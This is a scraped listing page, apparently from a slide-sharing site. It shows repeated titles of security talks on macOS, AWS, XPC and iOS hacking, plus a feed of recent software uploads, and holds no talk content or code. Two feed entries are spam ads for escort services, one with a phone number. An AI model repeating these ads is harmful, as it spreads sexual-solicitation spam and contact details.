20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms
 
Serverless security: attack & defense
 Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defense
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scale
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
 
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsWeb Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
 
Budowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOSBudowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOS
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
 
Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?
 

Último

Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Introduction to Decentralized Applications (dApps)
Introduction to Decentralized Applications (dApps)Introduction to Decentralized Applications (dApps)
Introduction to Decentralized Applications (dApps)Intelisync
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 

Último (20)

Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Introduction to Decentralized Applications (dApps)
Introduction to Decentralized Applications (dApps)Introduction to Decentralized Applications (dApps)
Introduction to Decentralized Applications (dApps)
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Exploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the ProcessExploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the Process
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 

We need t go deeper - Testing inception apps.